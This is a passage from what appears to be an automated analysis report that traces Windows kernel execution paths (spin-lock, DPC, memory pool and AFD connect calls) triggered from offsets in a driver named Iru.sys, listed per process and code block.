| Process 107 (msfeedssync.exe, PID: 4172) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1c8, SpinLock_unk_out = 0xfffff800fc55c1c8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1c8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1c8 |
| KeSetTimer | Timer_unk = 0xfffff800fc55c130, DueTime_unk = 0x0, Dpc_unk = 0xfffff800fc55c170, Timer_unk_out = 0xfffff800fc55c130, ret_val_out = 0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x1 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1c8, SpinLock_unk_out = 0xfffff800fc55c1c8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1c8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1c8 |
| IoCompleteRequest | ret_val_out = 0xc0000016 |
Execution Path #84 (length: 13, count: 9, processes: 4)
»
| Information | Value |
|---|---|
| Sequence Length | 13 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 5 |
| Process 24 (csrss.exe, PID: 456) | 2 |
| Process 30 (explorer.exe, PID: 1184) | 1 |
| Process 21 (smss.exe, PID: 300) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x4bfd7 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #129 (length: 14, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 14 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x3f, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77c4c0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #133 (length: 27, count: 3, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 27 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c1f8, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c1f8, ret_val_out = 1 |
| IoFreeMdl | Mdl_unk = 0xffffe0003e5f5550 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77f000, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x3fd3 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #172 (length: 13, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 13 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77f000, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x1 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Kernel Graph 23
Code Block #31 (EP #61)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2cb47f |
| Start Address | 0xfffff800416d5150 |
Execution Path #61 (length: 1, count: 4, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 4 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeWaitForMutexObject | ret_val_out = 0x102 |
Kernel Graph 24
Code Block #32 (EP #62)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2c63b0 |
| Start Address | 0xfffff8004169fe30 |
Execution Path #62 (length: 1, count: 4, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 4 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
Kernel Graph 25
Code Block #33 (EP #63)
»
| Information | Value |
|---|---|
| Trigger | KeAcquireSpinLockRaiseToDpc+0x2c |
| Start Address | 0xfffff800fc2b1d35 |
Execution Path #63 (length: 6, count: 3, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 6 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b4669f0, Irp_unk_out = 0xffffe0003b4669f0, ret_val_out = 0x103 |
Kernel Graph 26
Code Block #34 (EP #66, #73, #78, #82, #160)
»
| Information | Value |
|---|---|
| Trigger | IopfCompleteRequest+0x213 |
| Start Address | 0xfffff800fc2c2260 |
Execution Path #66 (length: 12, count: 3, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 12 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
| Process 25 (winlogon.exe, PID: 508) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x81, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003af95ec0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdRestartConnect | ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83eb0, Tag = 0x0 |
Execution Path #73 (length: 11, count: 11, processes: 3)
»
| Information | Value |
|---|---|
| Sequence Length | 11 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 8 |
| Process 25 (winlogon.exe, PID: 508) | 2 |
| Process 24 (csrss.exe, PID: 456) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdRestartConnect | ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83eb0, Tag = 0x0 |
Execution Path #78 (length: 11, count: 3, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 11 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
| Process 27 (dwm.exe, PID: 784) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7881bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdRestartSuperConnect | ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a787240, Tag = 0x0 |
Execution Path #82 (length: 15, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 15 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7a43dc, SpinLock_unk_out = 0xffffe0003a7a43dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7a43dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7a43dc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdRestartConnect | ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a788210, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #160 (length: 22, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 22 |
Processes
»
| Process | Count |
|---|---|
| Process 36 (wmiadap.exe, PID: 3776) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdRestartSuperConnect | ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83eb0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x1 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Kernel Graph 27
Code Block #35 (EP #72)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x145b0 |
| Start Address | 0xfffff800f8865740 |
Execution Path #72 (length: 1, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
Kernel Graph 28
Code Block #36 (EP #183, #193, #195)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x12f2f |
| Start Address | 0xfffff800f883b542 |
